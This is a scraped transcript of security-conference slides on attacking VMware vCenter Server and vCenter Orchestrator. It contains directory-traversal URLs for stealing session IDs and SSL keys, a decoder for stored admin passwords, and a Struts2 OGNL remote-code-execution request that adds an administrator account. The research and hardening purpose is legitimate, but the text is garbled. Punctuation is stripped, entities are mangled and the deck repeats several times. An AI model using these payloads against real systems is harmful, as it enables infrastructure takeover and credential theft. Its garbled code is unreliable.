Invest in security
Transcript of Invest in security
Invest in security to secure investments
How to hack VMware vCenter server in 60 seconds Alexey Sintsov Alexander Minozhenko
whoami
bull Pen-tester at ERPscan Company
bull Researcher
bull DCG7812
bull CTF
ERPScan
bull Innovative company engaged in ERP security RampD bull Part of ldquoDigital Securityrdquo a Russian group of
companies founded in 2002 bull Flagship product ndash ERPScan Security Scanner for
SAP bull Tools pen-testing tool sapsploit webxml scanner bull Consulting Services ERPSRMCRMSCADAetc Pen-testsSAP assessment SAP code review
Target
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
whoami
bull Pen-tester at ERPscan Company
bull Researcher
bull DCG7812
bull CTF
ERPScan
bull Innovative company engaged in ERP security RampD bull Part of ldquoDigital Securityrdquo a Russian group of
companies founded in 2002 bull Flagship product ndash ERPScan Security Scanner for
SAP bull Tools pen-testing tool sapsploit webxml scanner bull Consulting Services ERPSRMCRMSCADAetc Pen-testsSAP assessment SAP code review
Target
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
ERPScan
bull Innovative company engaged in ERP security RampD bull Part of ldquoDigital Securityrdquo a Russian group of
companies founded in 2002 bull Flagship product ndash ERPScan Security Scanner for
SAP bull Tools pen-testing tool sapsploit webxml scanner bull Consulting Services ERPSRMCRMSCADAetc Pen-testsSAP assessment SAP code review
Target
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Target
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Target
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
VMware vCenter Server
bull VMware vCenter Server is solution to manage VMware vSphere
CVE-2009-1523
bull Directory traversal in Jetty web server bull httptarget9084vcidownloadhealthxml3fFILE bull Discovered by Claudio Criscione bull But Fixed in VMware Update Manager 41 update 1 (
Directory traversalagain
bull Directory traversal in Jetty web server bull httptarget9084vcidownload5C5C5C5C5C
5C5C5CFILEEXT bull Discovered by Alexey Sintsov bull Metasploit module vmware_update_manager_traversalrb by
sinn3r
Directory traversal
bull What file to read bull Claudio Criscione propose to read vpxd-profiler- -
SessionStatsSessionPoolSessionId=06B90BCB-A0A4-4B9C-B680-FB72656A1DCBUsername=bdquoFakeDomainFakeUserSoapSessionId=AD45B176-63F3-4421-BBF0-FE1603E543F4Counttotal 1
bull Contains logs of SOAP requests with session ID
VASTO
bull ldquoVASTO ndash collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutionsrdquo httpvastonibblesecorg
bull vmware_updatemanager_traversalrb Jetty path traversal bull vmware_session_riderrb
Local proxy to ride stolen SOAPID sessions
bull Fixed in version 41 update 1 bull contain ip - addresses
Attack
bull Make arp spoofing bull Spoof ssl certificate
Attack
bull Administrators check SSL cert
Attack
bull Steal ssl key via directory traversal httptarget9084vcidownloadsDocuments and SettingsAll
UsersApplication DataVMwareVMware VirtualCenterSSLruikey
bull Make arp-spoofing bull Decrypt traffic with stolen ssl key bull What if arp-spoofing does not work
Vmware vCenter Orchestrator
bull Vmware vCO ndash software for automate configuration and management
bull Install by default with vCenter bull Have interesting file Program filesVMwareInfrastructureOrchestratorconfigurationjettyetcpasswdproperties
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
